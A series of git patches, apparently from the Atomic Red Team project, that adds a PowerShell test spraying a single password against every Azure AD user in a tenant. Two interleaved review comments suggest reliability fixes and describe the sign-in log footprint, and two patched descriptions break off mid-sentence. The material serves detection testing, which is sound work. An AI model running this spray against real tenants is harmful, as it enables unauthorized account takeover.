From f0735020e737cfa5397f5c52777015052ff8eebd Mon Sep 17 00:00:00 2001
From: piaconsigny <49986009+piaconsigny@users.noreply.github.com>
Date: Thu, 27 May 2021 08:55:55 -0700
Subject: [PATCH 1/4] T1110.003 azureadaccounts
---
 atomics/T1110.003/T1110.003.yaml | 56 ++++++++++++++++++++++++++++++++
 1 file changed, 56 insertions(+)
diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
index afa612f3..d6f731bd 100644
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -105,3 +105,59 @@ atomic_tests:
 }
 }
 Write-Host "End of password spraying"
+
+- name: Password spray all Azure AD users with a single password
+ auto_generated_guid: a8aa2d3e-1c52-4016-bc73-0f8854cfa80a
+ description: |
+ Attempt to brute force all Azure AD users with a single password (called "password spraying") via AzureAD Powershell module.
+ Valid credentials are only needed to fetch the list of Azure AD users.
+ supported_platforms:
+ - windows
+ input_arguments:
+ password:
+ description: Single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001)
+ type: String
+ default: P@ssw0rd!
+ valid_username:
+ description: Valid username to retrieve Azure AD users
+ type: String
+ default: bruce.wayne@contoso.com
+ valid_password:
+ description: Valid password to authenticate as valid_username
+ type: string
+ default: iamthebatman
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ AzureAD module must be installed.
+ prereq_command: |
+ if (Get-Module AzureAD) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Install-Module -Name AzureAD -Force
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Import-Module -Name AzureAD
+ $PWord = ConvertTo-SecureString -String "#{valid_password}" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{valid_username}", $Pword
+ Connect-AzureAD -Credential $Credential > $null
+
+ ($Users = Get-AzureADUser -All $true) > $null
+ Disconnect-AzureAD > $null
+ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+
+ $Users | Foreach-Object {
+ $user = $_.UserPrincipalName
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "$user", $Pword
+ try {
+ Write-Host " [-] Attempting #{password} on account ${user}."
+ Connect-AzureAD -Credential $Credential 2>&1> $null
+ # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
+ Write-Host " [!] ${user}:#{password} are valid credentials!`r`n"
+ Disconnect-AzureAD > $null
+ } catch {
+ Write-Host " [-] ${user}:#{password} invalid credentials.`r`n"
+ }
+ }
+ Write-Host "End of password spraying"
From 3c787ea2950511cca22f6d648374712b8efc8fe6 Mon Sep 17 00:00:00 2001
From: piaconsigny <49986009+piaconsigny@users.noreply.github.com>
Date: Mon, 7 Jun 2021 17:33:23 +0200
Subject: [PATCH 2/4] Change supported_platform to azure-ad
---
 atomics/T1110.003/T1110.003.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
index d6f731bd..3e7aca1b 100644
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -112,7 +112,7 @@ atomic_tests:
 Attempt to brute force all Azure AD users with a single password (called "password spraying") via AzureAD Powershell module.
 Valid credentials are only needed to fetch the list of Azure AD users.
 supported_platforms:
- - windows
+ - azure-ad
 input_arguments:
 password:
 description: Single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001)
From 6f2f97ad74c9c1b725f2b4fb7851dd2b43a87478 Mon Sep 17 00:00:00 2001
From: piaconsigny <49986009+piaconsigny@users.noreply.github.com>
Date: Fri, 2 Jul 2021 13:50:01 +0200
Subject: [PATCH 3/4] Apply suggestion
---
 atomics/T1110.003/T1110.003.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
index 3e7aca1b..315f6e0d 100644
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
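Review bot: The prerequisite check `if (Get-Module AzureAD) {exit 0} else {exit 1}` only sees modules already imported into the running session, so on a host where AzureAD is installed but not yet imported it reports the dependency as missing and `Install-Module -Name AzureAD -Force` runs on every execution; `if (Get-Module -ListAvailable AzureAD) {exit 0} else {exit 1}` checks the installed modules instead. In the spray loop the "valid credentials" message is printed whenever `Connect-AzureAD` does not throw, so a failure surfaced as a non-terminating error (which `2>&1> $null` discards) would be reported as a successful authentication; `Connect-AzureAD -Credential $Credential -ErrorAction Stop 2>&1> $null` makes any failure terminating and routes it into the catch block. The description should also state the footprint the test leaves for anyone validating detections against it, along the lines of `Produces one failed sign-in per enumerated Azure AD user in the tenant sign-in logs, preceded by a successful sign-in of valid_username used to list the accounts.` `$PWord` is assigned but read back as `$Pword`; PowerShell resolves this case-insensitively, but using one spelling avoids a reader assuming two variables are involved.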
@@ -119,7 +119,7 @@ atomic_tests:
 type: String
 default: P@ssw0rd!
 valid_username:
- description: Valid username to retrieve Azure AD users
+ description: Valid username to retrieve Azure AD users. We encourage users running this atomic to add a valid microsoft account domain; for eg @
 type: String
 default: bruce.wayne@contoso.com
 valid_password:
From b62c0a024afa56882ca61f4f645c3f52dc6c1724 Mon Sep 17 00:00:00 2001
From: piaconsigny <49986009+piaconsigny@users.noreply.github.com>
Date: Fri, 2 Jul 2021 13:53:39 +0200
Subject: [PATCH 4/4] Apply suggestion
---
 atomics/T1110.003/T1110.003.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
index 315f6e0d..0ebeed4c 100644
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -123,7 +123,7 @@ atomic_tests:
 type: String
 default: bruce.wayne@contoso.com
 valid_password:
- description: Valid password to authenticate as valid_username
+ description: Valid password to authenticate as valid_username in the
 type: string
 default: iamthebatman
 dependency_executor_name: powershell
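Review bot: The new `valid_username` description stops mid-sentence at `for eg @`, so the example domain the sentence announces never appears; the `valid_password` description added in PATCH 4/4 has the same problem, ending at `in the`. If this is the committed text and not an artifact of how the page was rendered, complete both sentences, for example `...for eg @contoso.onmicrosoft.com` and `...as valid_username in the target tenant`, so the generated documentation does not show dangling clauses.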